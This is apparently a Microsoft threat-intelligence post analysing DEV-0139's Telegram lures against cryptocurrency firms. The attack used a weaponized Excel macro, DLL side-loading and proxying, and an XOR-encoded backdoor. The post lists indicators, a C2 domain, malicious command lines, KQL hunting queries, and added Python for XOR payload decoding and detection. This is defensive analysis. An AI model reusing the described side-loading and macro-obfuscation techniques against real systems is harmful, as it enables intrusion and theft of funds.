DEV-0139 launches targeted attacks against the cryptocurrency industry

December 6th, 2022

Over the past several years, the cryptocurrency market has considerably expanded, gaining the interest of investors and threat actors. Cryptocurrency itself has been used by cybercriminals for their operations, notably for ransom payment in ransomware attacks, but we have also observed threat actors directly targeting organizations within the cryptocurrency industry for financial gain. Attacks targeting this market have taken many forms, including fraud, vulnerability exploitation, fake applications, and usage of info stealers, as attackers attempt to get their hands on cryptocurrency funds.

We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.

After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:

  1. A malicious macro in the weaponized Excel file abuses a VBA UserForm to obfuscate the code and to store the data it retrieves.
  2. The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. This Excel sheet is stored base64-encoded and is dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp.
  3. The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR-encoded backdoor.
  4. The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL is used to load and decrypt the XOR-encoded backdoor that lets the threat actor remotely access the infected system.

Figure 1. Overview of the attack

Further investigation through our telemetry led to the discovery of another file that uses the same DLL proxying technique. But instead of a malicious Excel file, it is delivered in an MSI package for a CryptoDashboardV2 application, dated June 2022. This may suggest other related campaigns are also run by the same threat actor, using the same techniques.

In this blog post, we will present the details uncovered from our investigation of the attack against a cryptocurrency investment company, as well as analysis of related files, to help similar organizations understand this kind of threat, and prepare for possible attacks. Researchers at Volexity recently published their findings on this attack as well.

As with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

Initial compromise

To identify the targets, the threat actor sought out members of cryptocurrency investment groups on Telegram. In the specific attack, DEV-0139 got in touch with their target on October 19, 2022 by creating a secondary Telegram group with the name <NameOfTheTargetedCompany> <> OKX Fee Adjustment and inviting three employees. The threat actor created fake profiles using details from employees of the company OKX. The screenshot below shows the real accounts and the malicious ones for two of the users present in the group.

Figure 2. Legitimate profiles of cryptocurrency exchange employees (left) and fake profiles created by the threat actor (right)

It’s worth noting that the threat actor appears to have a broad knowledge of the cryptocurrency industry and the challenges the targeted company may face. The threat actor asked questions about fee structures, that is, the fees charged by crypto exchange platforms for trading. These fees are a major concern for investment funds because they are a cost that must be optimized to minimize the impact on margin and profits; for such funds, as for many other companies in this industry, the largest costs come from the fees charged by exchanges. This is a very specific topic, and it demonstrates how advanced and well prepared the threat actor was before contacting their target.

After gaining the trust of the target, the threat actor sent a weaponized Excel document to the target containing further details on the fees to appear legitimate. The threat actor used the fee structure discussion as an opportunity to ask the target to open the weaponized Excel file and fill in their information.

Weaponized Excel file analysis

The weaponized Excel file, which has the file name OKX Binance & Huobi VIP fee comparision.xls (Sha256: abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0), is well crafted and contains legitimate information about the current fees used by some crypto exchanges. The metadata extracted showed that the file was created by the user Wolf:

File name OKX Binance & Huobi VIP fee comparision.xls
CompObjUserTypeLen 31
CompObjUserType Microsoft Excel 2003 Worksheet
ModifyDate 2022:10:14 02:34:33
TitleOfParts Comparison_Oct 2022
SharedDoc No
Author Wolf
CodePage Windows Latin 1 (Western European)
AppVersion 16
LinksUpToDate No
ScaleCrop No
LastModifiedBy Wolf
HeadingPairs Worksheets, 1
FileType XLS
FileTypeExtension xls
HyperlinksChanged No
Security None
CreateDate 2022:10:14 02:34:31
Software Microsoft Excel
MIMEType application/
Figure 3. The information in the malicious Excel file

The macro is obfuscated and abuses a UserForm (a feature used to create windows) to store data and variables. In this case, the UserForm is named IFUZYDTTOP, and the macro retrieves the information with code such as IFUZYDTTOP.MgQnQVGb.Caption, where MgQnQVGb is the name of a label in the UserForm and the .Caption property returns the string stored in that label.

The table below shows the data retrieved from the UserForm:

Obfuscated data | Original data
IFUZYDTTOP.nPuyGkKr.Caption & IFUZYDTTOP.jpqKCxUd.Caption | MSXML2.DOMDocument
IFUZYDTTOP.QevjtDZF.Caption | b64
IFUZYDTTOP.MgQnQVGb.Caption | bin.base64
IFUZYDTTOP.iuiITrLG.Caption | Base64 encoded Second Worksheet
IFUZYDTTOP.hMcZvwhq.Caption | C:\ProgramData\Microsoft Media
IFUZYDTTOP.PwXgwErw.Caption & IFUZYDTTOP.ePGMifdW.Caption | Excel.Application

The macro retrieves some parameters from the UserForm as well as another XLS file stored in base64. The XLS file is dropped into the directory C:\ProgramData\Microsoft Media as VSDB688.tmp and runs in invisible mode.

Figure 4. The deobfuscated code to load the extracted worksheet in invisible mode.

Additionally, the main sheet in the Excel file is protected with the password dragon to encourage the target to enable macros. The sheet is unprotected only after the other Excel file stored in base64 has been dropped and run. This is likely meant to trick the user into enabling macros without raising suspicion.

Extracted worksheet

The second Excel file, VSDB688.tmp (Sha256: a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9), is used to retrieve a PNG file that is parsed later by the macro to extract two executable files and the encrypted backdoor. Below is the metadata for the second worksheet:

File Name VSDB688.tmp
CompObjUserType Microsoft Excel 2003 Worksheet
ModifyDate 2022:08:29 08:07:24
TitleOfParts Sheet1
SharedDoc No
CodePage Windows Latin 1 (Western European)
AppVersion 16
LinksUpToDate No
ScaleCrop No
CompObjUserTypeLen 31
HeadingPairs Worksheets, 1
FileType XLS
FileTypeExtension xls
HyperlinksChanged No
Security None
CreateDate 2006:09:16 00:00:00
Software Microsoft Excel
MIMEType application/
Figure 5. The second file is completely empty but contains the same UserForm abuse technique as the first stage.

The table below shows the deobfuscated data retrieved from the UserForm:

Obfuscated data | Original data
GGPJPPVOJB.BkxQNjsP.Caption | b64
GGPJPPVOJB.slgGbwvS.Caption | bin.base64
GGPJPPVOJB.kiTajKHg.Caption | C:\ProgramData\SoftwareCache\
GGPJPPVOJB.fXSPzIWf.Caption | logagent.exe
GGPJPPVOJB.JzrHMGPQ.Caption | wsock32.dll
GGPJPPVOJB.pKLagNSW.Caption | 56762eb9-411c-4842-9530-9922c46ba2da
GGPJPPVOJB.grzjNBbk.Caption | /shadow
GGPJPPVOJB.aJmXcCtW.Caption & GGPJPPVOJB.zpxMSdzi.Caption | MSXML2.ServerXMLHTTP.6.0

The macro retrieves some parameters from the UserForm, then downloads a PNG file (Background.png) from an hxxps:// URL. The file was no longer available at the time of analysis, indicating that the threat actor likely deployed it only for this specific attack.

Figure 6. Deobfuscated code that shows the download of the file Background.png

The PNG is then split into three parts, which are written to three different files: the legitimate file logagent.exe, a malicious version of wsock32.dll, and the XOR-encrypted backdoor, stored under the GUID 56762eb9-411c-4842-9530-9922c46ba2da as its filename. The three files are used to load the main payload onto the target system.

Figure 7. The three files are written into C:\ProgramData\SoftwareCache\ and run using the CreateProcess API

Loader analysis

Two of the three files extracted from the PNG file, logagent.exe and wsock32.dll, are used to load the XOR encrypted backdoor. The following sections present our in-depth analysis of both files.

Logagent.exe

Logagent.exe (Hash: 8400f2674892cdfff27b0dfe98a2a77673ce5e76b06438ac6110f0d768459942) is a legitimate system application used to log errors from Windows Media Player and send the information for troubleshooting.

The file contains the following metadata, but it is not signed:

Description Value
language English-US
code-page Unicode UTF-16 little endian
CompanyName Microsoft Corporation
FileDescription Windows Media Player Logagent
FileVersion 12.0.19041.746
InternalName logagent.exe
LegalCopyright © Microsoft Corporation. All rights reserved.
OriginalFilename logagent.exe
ProductName Microsoft® Windows® Operating System
ProductVersion 12.0.19041.746

logagent.exe imports functions from wsock32.dll, which the threat actor abuses to load malicious code onto the targeted system. To trigger the malicious wsock32.dll, logagent.exe is run with the arguments previously retrieved by the macro: 56762eb9-411c-4842-9530-9922c46ba2da /shadow. Both arguments are read by wsock32.dll: the GUID 56762eb9-411c-4842-9530-9922c46ba2da is the filename of the encrypted payload that the malicious wsock32.dll loads, and /shadow is the XOR key used to decrypt it. Both parameters are needed for the malware to function, which hinders analysis of the DLL in isolation.

Figure 8. Command line execution from the running process logagent.exe

Wsock32.dll

The legitimate wsock32.dll is the Windows Socket API used by applications to handle network connections. In this attack, the threat actor used a malicious version of wsock32.dll to evade detection. The malicious wsock32.dll is loaded by logagent.exe through DLL side-loading and uses DLL proxying to call the legitimate functions from the real wsock32.dll and avoid detection. DLL proxying is a hijacking technique where a malicious DLL sits between the application calling an exported function and the legitimate DLL that implements that exported function. In this attack, the malicious wsock32.dll acts as a proxy between logagent.exe and the legitimate wsock32.dll.

That the DLL forwards calls to the legitimate functions can be seen in its import address table:

Figure 9. Import Address Table from wsock32.dll
Figure 10. Retrieving data with PeStudio revealed the original file name for the malicious wsock32.dll.

When the malicious wsock32.dll is loaded, it first retrieves the command line, and checks if the file with the GUID as a filename is present in the same directory using the CreateFile API to retrieve a file handle.

Figure 11. Verification of the presence of the file 56762eb9-411c-4842-9530-9922c46ba2da for decryption

The malicious wsock32.dll loads the file named with the GUID, decodes it, and runs the resulting implant in memory; the implant is used to remotely access the infected machine. File details of the malicious wsock32.dll:

SHA256 2e8d2525a523b0a47a22a1e9cc9219d6526840d8b819d40d24046b17db8ea3fb
Imphash 52ff8adb6e941e2ce41fd038063c5e0e
Rich PE Hash ff102ff1ac1c891d1f5be7294035d19e
Filetype PE32+ DLL
Compile Timestamp 2022-08-29 06:33:10 UTC

Once the file is loaded into the memory, it gives remote access to the threat actor. At the time of the analysis, we could not retrieve the final payload. However, we identified another variant of this attack and retrieved the payload, which is discussed in the next section. Identified implants were connecting back to the same command-and-control (C2) server.

Related attack

We identified another file using a similar mechanism to logagent.exe and delivering the same payload. The loader is packaged as an MSI package posing as an application called CryptoDashboardV2 (Hash: e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487). After installation, the MSI uses a legitimate application called tplink.exe to sideload the malicious DLL DUser.dll, which also uses DLL proxying.

creation datetime 11/12/2009 11:47
author 168 Trading
title Installation Database
page count 200
word count 2
keywords Installer, MSI, Database
last saved 11/12/2009 11:47
revision number {30CD8B94-5D3C-4B55-A5A3-3FC9C7CCE6D5}
last printed 11/12/2009 11:47
application name Advanced Installer 14.5.2 build 83143
subject CryptoDashboardV2
template x64;1033
code page Latin I
comments This installer database contains the logic and data required to install CryptoDashboardV2.
Figure 12. Installation details of the MSI file

Once the package is installed, it runs and side-loads the DLL using the following command: "C:\Users\user\AppData\Roaming\Dashboard_v2\TPLink.exe" 27E57D84-4310-4825-AB22-743C78B8F3AA /sven, which noticeably uses a different GUID.

Further analysis of the malicious DUser.dll showed that its original name is also HijackingLib.dll, same as the malicious wsock32.dll. This could indicate the usage of the same tool to create these malicious DLL proxies. Below are the file details of DUser.dll:

SHA256 90b0a4c9fe8fd0084a5d50ed781c7c8908f6ade44e5654acffea922e281c6b33
Imphash 52ff8adb6e941e2ce41fd038063c5e0e
Rich PE Hash ff102ff1ac1c891d1f5be7294035d19e
Filetype Win32 DLL
Compile Timestamp 2022-06-20 07:47:07 UTC

Once the DLL is running, it loads and decodes the implant in memory and starts beaconing to the same domain. In this variant, the implant file is named with the GUID 27E57D84-4310-4825-AB22-743C78B8F3AA and the XOR key is /sven.
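Both loaders described above read a GUID-named blob and a command-line switch (/shadow, /sven) that serves as the XOR key. The Python below is an added example, not code from Microsoft's analysis or from the malware: it decodes such a blob with a known key, checks that the result has MZ/PE headers, and, when the command line was not captured, recovers a repeating XOR key from the standard DOS stub text. It assumes the decoded payload places that stub text at offset 0x4E (the common MSVC layout); the sample blob is constructed inline.

```python
import struct
from typing import Optional, Tuple

# Known plaintext present in practically every MSVC-linked PE: the DOS stub message.
# Assumption: the decoded payload uses the common layout that puts it at offset 0x4E.
# An unusual stub breaks key recovery only; decoding with a known key is unaffected.
DOS_STUB = b"This program cannot be run in DOS mode."
DOS_STUB_OFFSET = 0x4E


def xor_decode(blob: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric, so the same call encodes the constructed sample."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def looks_like_pe(data: bytes) -> bool:
    """Cheap structural check: MZ magic plus a PE\\0\\0 signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_xor_key(blob: bytes, max_key_len: int = 32) -> Optional[bytes]:
    """Shortest repeating XOR key consistent with the DOS stub known plaintext.

    A key with an internal period (e.g. b"abab") comes back in its shortest
    form, which decodes identically. Returns None if the blob is too short
    or no key length up to max_key_len fits.
    """
    window = blob[DOS_STUB_OFFSET:DOS_STUB_OFFSET + len(DOS_STUB)]
    if len(window) < len(DOS_STUB):
        return None
    for key_len in range(1, max_key_len + 1):
        key = [None] * key_len
        consistent = True
        for j, (cipher_byte, plain_byte) in enumerate(zip(window, DOS_STUB)):
            slot = (DOS_STUB_OFFSET + j) % key_len  # key byte used at this absolute offset
            k = cipher_byte ^ plain_byte
            if key[slot] is None:
                key[slot] = k
            elif key[slot] != k:
                consistent = False
                break
        if consistent and all(k is not None for k in key):
            return bytes(key)
    return None


def triage_payload(blob: bytes, key: Optional[bytes] = None) -> Optional[Tuple[bytes, bytes]]:
    """Return (key, decoded_bytes) when the blob decodes to something PE-shaped, else None."""
    if key is None:
        key = recover_xor_key(blob)
        if key is None:
            return None
    decoded = xor_decode(blob, key)
    return (key, decoded) if looks_like_pe(decoded) else None


def build_sample_pe() -> bytes:
    """Constructed stand-in for a decoded implant: DOS header, stub text, PE signature."""
    buf = bytearray(0x100)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)  # e_lfanew -> PE header at 0x80
    buf[DOS_STUB_OFFSET:DOS_STUB_OFFSET + len(DOS_STUB)] = DOS_STUB
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


# Constructed sample: the fake PE encoded with the first variant's switch as the key.
SAMPLE_KEY = b"/shadow"
ENCODED_SAMPLE = xor_decode(build_sample_pe(), SAMPLE_KEY)

if __name__ == "__main__":
    result = triage_payload(ENCODED_SAMPLE)  # no key supplied: recover it from the stub
    print("recovered key:", result[0] if result else None)
```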

Implant analysis

The payload decoded in the memory by the malicious DLL is an implant used by the threat actor to remotely access the compromised machine. We were able to get the one from the second variant we uncovered. Below are the details of the payload:

SHA256 ea31e626368b923419e8966747ca33473e583376095c48e815916ff90382dda5
Imphash 96321fa09a450119a8f0418ec86c3e08
Rich PE Hash 8c4fb0cb671dbf8d859b875244c4730c
Filetype Win32 DLL
Compile Timestamp 2022-06-20 00:51:33 UTC

First, the sample retrieves some information from the targeted system. It can connect back to a remote server and receive commands from it.

Figure 13. Details about the connection to the C2.
Figure 14. The sample is connecting back to the domain name strainservice[.]com.


It is also notable that the threat actor abused OpenDrive in one of the variants to deliver the payload. The OpenDrive account had been set up shortly before and was used only once, indicating that it was created for this single target.

We identified one domain used as a C2 server, strainservice[.]com, to which both implants connected back. This domain was registered on June 26 on Namecheap, just before the distribution of the first variant. At the time of the attack, the server had ports 80, 443, and 2083 open. The implants communicated on port 443.

Defending against targeted attacks

In this report we analyzed a targeted attack on cryptocurrency investment fund startups. Such companies are relatively new but manage hundreds of millions of dollars, which attracts the interest of threat actors.

In this attack we identified that the threat actor has broad knowledge of the cryptocurrency industry as well as the challenges their targets may face, increasing the sophistication of the attack and their chance of success. The threat actor used Telegram, an app widely used in the field, to identify the profile of interest, gained the target’s trust by discussing relevant topics, and finally sent a weaponized document that delivered a backdoor through multiple mechanisms. Additionally, the second attack we identified used a fake crypto dashboard application as its lure.

The cryptocurrency market remains a field of interest for threat actors. Targeted users are identified through trusted channels to increase the chance of success. While the biggest companies can be targeted, smaller companies can also be targets of interest. The techniques used by the actor covered in this blog can be mitigated by adopting the security considerations provided below:

  • Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
  • Educate end users about protecting personal and business information in social media, filtering unsolicited communication (in this case, Telegram chat groups), identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.
  • Educate end users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent via instant messaging applications or social networks. Encourage end users to practice good credential hygiene and make sure the Microsoft Defender Firewall (which is enabled by default) is always on to prevent malware infection and stifle propagation.
  • Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.
  • Turn on attack surface reduction rules to prevent common attack techniques observed in this threat:
    • Block Office applications from creating executable content
    • Block Office communication application from creating child processes
    • Block Win32 API calls from Office macros
  • Ensure that Microsoft Defender Antivirus is up to date and that real-time behavior monitoring is enabled.

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

  • TrojanDownloader:O97M/Wolfic.A
  • TrojanDownloader:O97M/Wolfic.B
  • TrojanDownloader:O97M/Wolfic.C
  • TrojanDownloader:Win32/Wolfic.D
  • TrojanDownloader:Win32/Wolfic.E
  • Behavior:Win32/WolficDownloader.A
  • Behavior:Win32/WolficDownloader.B

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network:

  • An executable loaded an unexpected dll
  • DLL search order hijack
  • ‘Wolfic’ malware was prevented

Advanced hunting queries

The following hunting queries locate relevant activity.

Query that looks for Office apps that create a file within one of the known bad directories:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook", "powerpnt")
| where ActionType == "FileCreated"
| where tostring(parse_path(FolderPath).DirectoryPath) has_any (
    @"C:\ProgramData\Microsoft Media",
    @"C:\ProgramData\SoftwareCache")
| project Timestamp, DeviceName, FolderPath, InitiatingProcessFileName, SHA256, InitiatingProcessAccountName, InitiatingProcessAccountDomain

Query that looks for Office apps that create a file within an uncommon directory (fewer than five occurrences) and builds a set of each machine this is seen on and each user that has executed it, to help gauge how many users and hosts are compromised:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook", "powerpnt")
| where ActionType == "FileCreated"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize PathCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, Path, InitiatingProcessFileName, SHA256
| where PathCount < 5

Query that summarizes child processes of Office apps, looking for fewer than five occurrences:

DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| summarize ProcessCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, FolderPath, SHA256, InitiatingProcessFileName
| where ProcessCount < 5

Query that lists all executables with Microsoft as ProcessVersionInfoCompanyName, groups them by path, then looks for uncommon paths with fewer than five occurrences:

DeviceProcessEvents
| where ProcessVersionInfoCompanyName has "Microsoft"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize ProcessList=make_set(FileName) by Path
| where array_length( ProcessList ) < 5

Query that searches for connections to malicious domains and IP addresses:

DeviceNetworkEvents
// the C2 IP address is not listed on this page; replace the placeholder with the indicator
| where (RemoteUrl has_any ("strainservice.com"))
     or (RemoteIP has_any ("<C2 IP address>"))

Query that searches for files downloaded from malicious domains and IP addresses:

DeviceFileEvents
// the download URL and C2 IP address are not listed on this page; replace the placeholders with the indicators
| where (FileOriginUrl has_any ("<OpenDrive download URL>"))
     or (FileOriginIP has_any ("<C2 IP address>"))

Query that searches for Office apps downloading files from uncommon domains and groups users, filenames, and devices together:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| summarize DomainCount=count(), UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName),
    FileList=make_set(FileName) by FileOriginUrl, FileOriginIP, InitiatingProcessFileName

Query that looks for downloaded files with uncommon file extensions and groups remote IPs, URLs, filenames, users, and devices:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt", "outlook")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| extend Extension=tostring(parse_path(FolderPath).Extension)
| extend Path=tostring(parse_path(FolderPath).DirectoryPath)
| summarize ExtensionCount=count(), IpList=make_set(FileOriginIP), UrlList=make_set(FileOriginUrl), FileList=make_set(FileName),
    UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName) by Extension, InitiatingProcessFileName

Query that looks for Office apps with child processes whose command line matches the GUID pattern, with a check for Microsoft binaries to reduce the results before the regex:

DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ProcessVersionInfoCompanyName has "Microsoft"
// the switch after the GUID is a word (/shadow, /sven), so the final class is repeated
| where ProcessCommandLine matches regex
    @"[A-Za-z0-9]+\.exe [A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12} /[A-Za-z0-9]+$"
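The GUID command-line check above, carried over into Python as an added example (not one of the Microsoft queries) so it can be run against exported or constructed process records: it applies the same Office-parent and Microsoft-company filters and then matches the command line, with the switch pattern widened to a word so that /shadow and /sven both match. The sample events are constructed, and the field names mirror the DeviceProcessEvents columns used in the query.

```python
import re
from typing import Dict, Iterable, List

Event = Dict[str, str]

# Parent processes the hunting query treats as Office hosts (same terms as the KQL;
# substring matching here approximates KQL's term-based has_any).
OFFICE_PARENTS = ("word", "excel", "access", "powerpnt")

# <name>.exe <GUID> /<switch>. The switch is a word ("/shadow", "/sven"), so '+'
# follows the slash; a single-character class would miss both observed command lines.
GUID_CMDLINE_RE = re.compile(
    r"[A-Za-z0-9]+\.exe "
    r"[A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12}"
    r" /[A-Za-z0-9]+$"
)


def matches_guid_cmdline(cmdline: str) -> bool:
    """A quoted path (as in the MSI variant) puts '"' between .exe and the space; strip quotes first."""
    return GUID_CMDLINE_RE.search(cmdline.replace('"', "")) is not None


def is_suspicious_child(event: Event) -> bool:
    """Office parent + Microsoft company name + GUID/switch command line, as in the query."""
    parent = event.get("InitiatingProcessFileName", "").lower()
    if not any(term in parent for term in OFFICE_PARENTS):
        return False
    if "microsoft" not in event.get("ProcessVersionInfoCompanyName", "").lower():
        return False
    return matches_guid_cmdline(event.get("ProcessCommandLine", ""))


def hunt(events: Iterable[Event]) -> List[Event]:
    return [e for e in events if is_suspicious_child(e)]


# Constructed sample of DeviceProcessEvents-style records (not real telemetry).
SAMPLE_EVENTS: List[Event] = [
    {   # first variant: Excel spawned logagent.exe with the GUID and /shadow -> flagged
        "DeviceName": "ws01", "InitiatingProcessFileName": "EXCEL.EXE",
        "FileName": "logagent.exe", "ProcessVersionInfoCompanyName": "Microsoft Corporation",
        "ProcessCommandLine": "logagent.exe 56762eb9-411c-4842-9530-9922c46ba2da /shadow",
    },
    {   # benign Excel child with a Microsoft company name but no GUID argument -> not flagged
        "DeviceName": "ws01", "InitiatingProcessFileName": "EXCEL.EXE",
        "FileName": "splwow64.exe", "ProcessVersionInfoCompanyName": "Microsoft Corporation",
        "ProcessCommandLine": "splwow64.exe 12288",
    },
    {   # MSI variant: parent is the installer, not an Office app, and the company name
        # (not stated on the page, left empty) is not Microsoft -> not surfaced by this query
        "DeviceName": "ws02", "InitiatingProcessFileName": "msiexec.exe",
        "FileName": "TPLink.exe", "ProcessVersionInfoCompanyName": "",
        "ProcessCommandLine": r'"C:\Users\user\AppData\Roaming\Dashboard_v2\TPLink.exe" '
                              "27E57D84-4310-4825-AB22-743C78B8F3AA /sven",
    },
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["DeviceName"], hit["FileName"], hit["ProcessCommandLine"])
```

The third record shows why the MSI variant needs the path-based queries and the DLL side-loading alerts listed above rather than this parent-process check.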

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytic to automatically match the malicious IP and domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here:

To supplement this indicator matching customers can use the Advanced Hunting queries listed above against Microsoft 365 Defender data ingested into their workspaces as well as the following Microsoft Sentinel queries:

Indicators of compromise

IOC | Filename/Type | Description
abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0 | OKX Binance & Huobi VIP fee comparision.xls | Weaponized Excel file
17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b | OKX Binance & Huobi VIP fee comparision.xls | Weaponized Excel file
a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9 | VSDB688.tmp | Second worksheet dropped
2e8d2525a523b0a47a22a1e9cc9219d6526840d8b819d40d24046b17db8ea3fb | wsock32.dll / HijackingLib.dll | Malicious dropper that acts as a DLL proxy to the legitimate wsock32.dll
82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629 | Duser.dll |
90b0a4c9fe8fd0084a5d50ed781c7c8908f6ade44e5654acffea922e281c6b33 | Duser.dll / HijackingLib.dll | Malicious dropper that acts as a DLL proxy to the legitimate Duser.dll
e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487 | 4acbe3.msi | Fake CryptoDashboard application MSI package delivering Duser.dll
82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629 | 43d972.msi | Second fake application BloxHolder delivering Duser.dll
ea31e626368b923419e8966747ca33473e583376095c48e815916ff90382dda5 | DLL | Implant loaded by Duser.dll
C:\ProgramData\SoftwareCache\wsock32.dll | Path | Path of wsock32.dll
C:\Users\user\AppData\Roaming\Dashboard_v2\DUser.dll | Path | Path of DUser.dll
C:\Program Files\CryptoDashboardV2\ | Path | Path of the fake app
C:\ProgramData\Microsoft Media\VSDB688.tmp | Path | Path of the second worksheet
hxxps:// | Background.png downloaded from OpenDrive | PNG file downloaded on the victim machines
strainservice[.]com | Domain/C2 | Command and control server
 | IP/C2 | IP of the C2
56762eb9-411c-4842-9530-9922c46ba2da | GUID | GUID used
27E57D84-4310-4825-AB22-743C78B8F3AA | GUID | GUID used
TPLink.exe 27E57D84-4310-4825-AB22-743C78B8F3AA /sven | Command line | Command line run by the legitimate executable
logagent.exe 56762eb9-411c-4842-9530-9922c46ba2da /shadow | Command line | Command line run by the legitimate file

MITRE ATT&CK techniques

Tactic | Technique ID | Name | Description
Reconnaissance | T1591 | Gather Victim Org Information | The attackers gathered information about the targets, reaching them on Telegram with a clear understanding of their challenges.
Reconnaissance | T1593.001 | Social Media | Attackers identified the targets in specific cryptocurrency groups on Telegram.
Resource Development | T1583.001 | Acquire Infrastructure: Domains | Attackers registered the domain “” on June 18.
Initial Access | T1566.001 | Spearphishing Attachment | Attackers sent a weaponized Excel document.
Execution | T1204.002 | User Execution: Malicious File | The targeted user must open the weaponized Excel document and enable macros.
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic | Attackers used VBA in the malicious Excel document “OKX Binance & Huobi VIP fee comparision.xls” to deliver the implant.
Execution | T1106 | Native API | Usage of the CreateProcess API in the Excel document to run the executable.
Persistence, Privilege Escalation, Defense Evasion | T1574.002 | DLL Side-Loading | The attackers abused the legitimate logagent.exe to side-load the malicious wsock32.dll and the legitimate TPLink.exe to side-load DUser.dll.
Defense Evasion | T1027 | Obfuscated Files or Information | The malicious VBA is obfuscated using a UserForm to hide variables and data.
Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location | The attackers use legitimate DLL names for DLLs that act as proxies to the original ones (wsock32.dll and DUser.dll).
Defense Evasion | T1027.009 | Obfuscated Files or Information: Embedded Payloads | The malicious DLLs drop the implant onto the machine.
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | The implant communicates with the remote domain over port 80 or 443.
Command and Control | T1132 | Data Encoding | The implant encodes the data exchanged with the C2.
Exfiltration | T1041 | Exfiltration Over C2 Channel | The implant has the ability to exfiltrate information.

The post DEV-0139 launches targeted attacks against the cryptocurrency industry appeared first on Microsoft Security Blog.

BlueHat 2023: Applications to Attend NOW OPEN!

December 2nd, 2022

We are excited to announce that applications to attend BlueHat 2023 are now open!   BlueHat 2023 will be the 20th version of the BlueHat conference and will once again be on the Microsoft campus in Redmond, WA, USA, from February 8 – 9, 2023.   Hosted by the Microsoft Security Response Center (MSRC), BlueHat is where …


Implementing Zero Trust access to business data on BYOD with Trustd MTD and Microsoft Entra

November 30th, 2022 No comments

